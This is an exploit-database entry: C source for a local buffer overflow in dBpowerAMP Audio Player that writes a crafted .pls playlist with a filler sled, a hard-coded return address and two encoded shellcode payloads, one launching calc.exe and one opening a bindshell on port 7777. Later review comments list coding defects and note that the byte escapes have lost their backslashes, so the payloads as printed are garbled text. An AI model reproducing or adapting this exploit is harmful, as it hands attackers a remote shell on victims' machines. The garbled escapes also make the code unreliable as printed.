# Title : dBpowerAMP Audio Player 2 .PLS File Local Buffer Overflow Exploit
# Published : 2009-02-05
# Author : SimO-s0fT
/*
* simo36.c
* CODED By SimO-s0fT (Morrocco-->marrakesh city)
* Home : Exploiter-ma.com
* e-mail: maroc-anti-connexion[at]hotmail.com[dot]com
*greetz : Stack & Djekmani4ever & alphanix & all friends
* dBpowerAMP Audio Player local buffer overflow exploit
*
* this feat was exploit windows trus sp2
* there is a small problem on the farm but fortunately I managed to use it
* and remember that this feat has been operating as trus win
* I test and winxp sp1 I found another problem
* example:
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&& G:\Documents and Settings\SimO\Bureau>simo simo36.pls &&&&&
&&&&& ################################################################ &&&&&
&&&&& dBpowerAMP Audio Player local buffer overflow exploit &&&&&
&&&&& Coded By SimO-s0fT &&&&&
&&&&& e-mail : simo[at]exploiter-ma[dot]com &&&&&
&&&&& ################################################################ &&&&&
&&&&& USAGE : simo36.exe simo.pls &&&&&
&&&&& [1] execute calc.exe &&&&&
&&&&& [2] execute bindshell LPORT=7777 &&&&&
&&&&& ################################################################ &&&&&
&&&&& enter 2 &&&&&
&&&&& created !! &&&&&
&&&&& openit with dBpowerAMP &&&&&
&&&&& &&&&&
&&&&& G:\Documents and Settings\SimO>telnet 127.0.0.1 7777 &&&&&
&&&&& Microsoft Windows XP [version 5.1.2600] &&&&&
&&&&& Microso(C) Copyright 1985-2001 Microsoft Corp. &&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
*/
#include<stdio.h>
#include<string.h>
#include<stdlib.h>
#include<windows.h>
/* Number of filler bytes (0x90, see memset in main) written before the
 * four bytes of RET are copied in at buffer+OFFSET. Hard-coded for one
 * target build; there is no derivation of it anywhere in this file. */
#define OFFSET 257
/* Prefix written to the output file before the overflow buffer
 * (main: fputs(header, openfile)). Read as \xNN bytes, the sequence
 * appears to spell the playlist header "[playlist]" CR CR
 * "NumberOfEntries=1" CR CR "File1=http://", i.e. the oversized URL
 * of the single File1= entry is what overruns the player's buffer.
 * A .pls whose File1= value runs straight into a long run of 0x90
 * bytes is therefore the recognisable shape of this file.
 * NOTE(review): in this copy the backslash of every \xNN escape is
 * missing, so as printed the literal is the plain ASCII text "x5bx70..."
 * and strlen()/fputs() in main operate on that text, not on the bytes
 * the author intended. The same applies to scode1 and scode2 below. */
char header[]=
"x5bx70x6cx61x79x6cx69x73x74x5dx0dx0dx4ex75x6dx62"
"x65x72x4fx66x45x6ex74x72x69x65x73x3dx31x0dx0dx46"
"x69x6cx65x31x3dx68x74x74x70x3ax2fx2f";
// Payload used by case 1 of main (the menu labels it "execute calc.exe").
// It is copied with strlen()/memcpy(), so the encoded form must contain
// no NUL byte; nothing in this file verifies that.
// NOTE(review): as with header, the \xNN escapes have lost their
// backslashes in this copy, so the literal is ASCII text as printed.
char scode1[] =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
"x42x30x42x50x42x30x4bx48x45x54x4ex43x4bx38x4ex47"
"x45x50x4ax57x41x30x4fx4ex4bx58x4fx54x4ax41x4bx38"
"x4fx45x42x42x41x50x4bx4ex49x44x4bx38x46x33x4bx48"
"x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c"
"x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x32x46x50x45x47x45x4ex4bx58"
"x4fx45x46x52x41x50x4bx4ex48x56x4bx58x4ex50x4bx44"
"x4bx48x4fx55x4ex41x41x30x4bx4ex4bx58x4ex41x4bx38"
"x41x50x4bx4ex49x48x4ex45x46x32x46x50x43x4cx41x33"
"x42x4cx46x46x4bx38x42x44x42x53x45x38x42x4cx4ax47"
"x4ex30x4bx48x42x44x4ex50x4bx58x42x37x4ex51x4dx4a"
"x4bx48x4ax36x4ax30x4bx4ex49x50x4bx38x42x58x42x4b"
"x42x50x42x50x42x50x4bx38x4ax36x4ex43x4fx45x41x53"
"x48x4fx42x46x48x35x49x38x4ax4fx43x48x42x4cx4bx57"
"x42x45x4ax36x42x4fx4cx38x46x30x4fx35x4ax46x4ax39"
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x46x41x46"
"x4ex46x43x36x42x50x5ax2f";
// Payload used by case 2 of main (the menu labels it "bindshell LPORT=7777").
// Copied with strlen()/memcpy() exactly like scode1, with the same
// no-NUL-byte requirement and the same lost-backslash caveat: as printed
// here this is ASCII text, not the byte sequence the author intended.
// The listening port named in the menu is not visible anywhere in this
// file except inside this opaque blob, so it cannot be confirmed here.
char scode2[] =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x37x49x49x49x49x49x49x49x49x51x5ax6ax61"
"x58x30x42x31x50x42x41x6bx41x41x71x32x41x42x41x32"
"x42x41x30x42x41x58x38x41x42x50x75x6dx39x4bx4cx32"
"x4ax5ax4bx50x4dx6dx38x6bx49x49x6fx59x6fx39x6fx35"
"x30x6cx4bx70x6cx65x74x37x54x4cx4bx42x65x47x4cx6e"
"x6bx31x6cx46x65x33x48x43x31x48x6fx6cx4bx70x4fx65"
"x48x6cx4bx73x6fx35x70x37x71x38x6bx31x59x4cx4bx46"
"x54x6ex6bx53x31x58x6ex30x31x6fx30x4fx69x4ex4cx4b"
"x34x49x50x41x64x46x67x49x51x7ax6ax46x6dx43x31x48"
"x42x5ax4bx38x74x47x4bx30x54x64x64x51x38x42x55x4b"
"x55x4ex6bx53x6fx51x34x43x31x4ax4bx50x66x4ex6bx46"
"x6cx42x6bx4cx4bx73x6fx75x4cx33x31x5ax4bx65x53x34"
"x6cx6ex6bx6dx59x30x6cx57x54x55x4cx55x31x4bx73x74"
"x71x69x4bx65x34x6ex6bx43x73x74x70x6cx4bx67x30x46"
"x6cx6cx4bx70x70x67x6cx6ex4dx6cx4bx57x30x44x48x71"
"x4ex72x48x4ex6ex50x4ex54x4ex38x6cx70x50x4bx4fx4e"
"x36x71x76x41x43x31x76x31x78x76x53x30x32x53x58x30"
"x77x44x33x57x42x63x6fx70x54x6bx4fx48x50x73x58x58"
"x4bx58x6dx6bx4cx57x4bx70x50x6bx4fx6ax76x71x4fx6d"
"x59x4bx55x65x36x6cx41x68x6dx53x38x63x32x42x75x51"
"x7ax36x62x59x6fx58x50x71x78x4ax79x34x49x4bx45x6e"
"x4dx30x57x69x6fx4ex36x52x73x41x43x62x73x76x33x51"
"x43x70x43x43x63x73x73x36x33x6bx4fx4ax70x75x36x41"
"x78x75x4ex71x71x35x36x42x73x4bx39x79x71x6cx55x70"
"x68x4fx54x75x4ax32x50x39x57x52x77x69x6fx38x56x70"
"x6ax72x30x50x51x53x65x4bx4fx58x50x55x38x6cx64x4c"
"x6dx34x6ex49x79x66x37x6bx4fx4ex36x50x53x30x55x69"
"x6fx4ax70x53x58x7ax45x41x59x4ex66x37x39x36x37x69"
"x6fx59x46x72x70x50x54x31x44x33x65x4bx4fx5ax70x4f"
"x63x51x78x38x67x50x79x38x46x43x49x32x77x4bx4fx4b"
"x66x62x75x79x6fx6ax70x45x36x30x6ax52x44x30x66x41"
"x78x32x43x72x4dx6fx79x6dx35x62x4ax42x70x70x59x74"
"x69x5ax6cx6cx49x6bx57x41x7ax32x64x6bx39x68x62x30"
"x31x6fx30x6bx43x6ex4ax6bx4ex51x52x34x6dx49x6ex62"
"x62x36x4cx5ax33x6cx4dx71x6ax65x68x6ex4bx4cx6bx4e"
"x4bx55x38x30x72x59x6ex4cx73x37x66x4bx4fx30x75x63"
"x74x39x6fx6ex36x33x6bx36x37x72x72x31x41x31x41x46"
"x31x50x6ax55x51x31x41x41x41x32x75x42x71x39x6fx48"
"x50x50x68x6cx6dx39x49x45x55x78x4ex30x53x39x6fx6b"
"x66x62x4ax79x6fx39x6fx47x47x39x6fx58x50x4ex6bx50"
"x57x4bx4cx6cx43x4bx74x70x64x6bx4fx6ax76x41x42x49"
"x6fx58x50x30x68x68x6fx6ax6ex4bx50x31x70x42x73x49"
"x6fx58x56x49x6fx78x50x61";
/*
 * Entry point. Prints a menu, reads a choice from stdin with scanf("%d"),
 * and writes to the file named by argv[1]: header, then a buffer of
 * OFFSET 0x90 bytes, the four-byte value RET, and either scode1 (case 1)
 * or scode2 (case 2).
 *
 * Defects visible in this block (documented here, not changed):
 *  - argc is never checked; argv[1] goes straight to fopen().
 *  - exit(0) on fopen failure reports success to the caller.
 *  - malloc() results are not checked before memset()/memcpy().
 *  - buffer is filled entirely by memset/memcpy and never NUL-terminated,
 *    so fputs(buffer, ...) reads past the end of the allocation (UB);
 *    fwrite() with the computed length would be the bounded equivalent.
 *  - if number is neither 1 nor 2, buffer is freed while uninitialized
 *    and openfile is never closed.
 *  - case 1 copies sizeof(RET)-1 bytes of RET, case 2 copies sizeof(RET);
 *    the two branches are otherwise identical and not shared.
 *  - the printf/perror literals appear to have lost their escape
 *    characters in this copy ("...exploitn" presumably was "...exploit\n").
 */
int main(int argc,char *argv[]){
FILE *openfile;               /* output file, opened with "wb" below */
unsigned char *buffer;        /* filler + RET + payload; never NUL-terminated */
unsigned int RET=0x7c85d568;  /* value copied in at buffer+OFFSET; hard-coded, no relocation handling */
unsigned int offset=0;        /* write cursor into buffer */
int number=0;                 /* menu choice; stays 0 if scanf fails, so no case runs */
printf("################################################################n");
printf(" dBpowerAMP Audio Player local buffer overflow exploitn");
printf("tCoded By SimO-s0fTn");
printf("e-mail : simo[at]exploiter-ma[dot]comn");
printf("################################################################n");
printf("USAGE : simo36.exe simo.plsn");
printf("[1] execute calc.exen");
printf("[2] execute bindshell LPORT=7777n");
printf("################################################################n");
system("color 04");  /* cosmetic: spawns a shell just to recolour the console; return value ignored */
sleep(2000);  /* NOTE(review): with <windows.h> the API is Sleep() in ms; lowercase sleep() is
                 POSIX seconds. Which one this resolves to depends on the toolchain - confirm. */
printf("enter");
scanf("%d",&number);  /* return value unchecked */
if((openfile=fopen(argv[1],"wb"))==NULL){  /* argv[1] may be NULL: argc is not checked */
perror("cannot opening file xD");
exit(0);  /* exit status 0 on an error path */
}
switch(number){
case 1:
buffer = (unsigned char *) malloc (OFFSET + sizeof(RET) + strlen(scode1));  /* unchecked; cast is unnecessary in C */
memset(buffer,0x90,OFFSET + sizeof(RET) + strlen(scode1));  /* whole allocation becomes filler, no NUL anywhere */
offset=OFFSET;
memcpy(buffer+offset,&RET,sizeof(RET)-1);  /* copies all but the last byte of RET (case 2 copies all of it);
                                              the remaining byte keeps the 0x90 from memset */
offset+=sizeof(RET);
memcpy(buffer+offset,scode1,strlen(scode1));
offset+=strlen(scode1);
fputs(header,openfile);
fputs(buffer,openfile);  /* UB: buffer has no terminator, so fputs reads beyond the allocation;
                            also passes unsigned char * where const char * is expected */
fclose(openfile);  /* return value (flush errors) ignored */
printf("created !!nopenit with dBpowerAMP");
break;
case 2:
buffer = (unsigned char *) malloc ( OFFSET + sizeof(RET) + strlen(scode2));  /* unchecked, as in case 1 */
memset(buffer,0x90, OFFSET + sizeof(RET) + strlen(scode2));
offset=OFFSET;
memcpy(buffer+offset,&RET,sizeof(RET));  /* full RET copied here, unlike case 1 */
offset+=sizeof(RET);
memcpy(buffer+offset,scode2,strlen(scode2));
offset+=strlen(scode2);
fputs(header,openfile);
fputs(buffer,openfile);  /* same unterminated-buffer read as in case 1 */
fclose(openfile);
printf("created !!n openit with dBpowerAMP");
break;
}
/* No default case: for any other number the file stays open and buffer is
 * still uninitialized when it reaches free() below (UB). */
free(buffer);
return 0;
}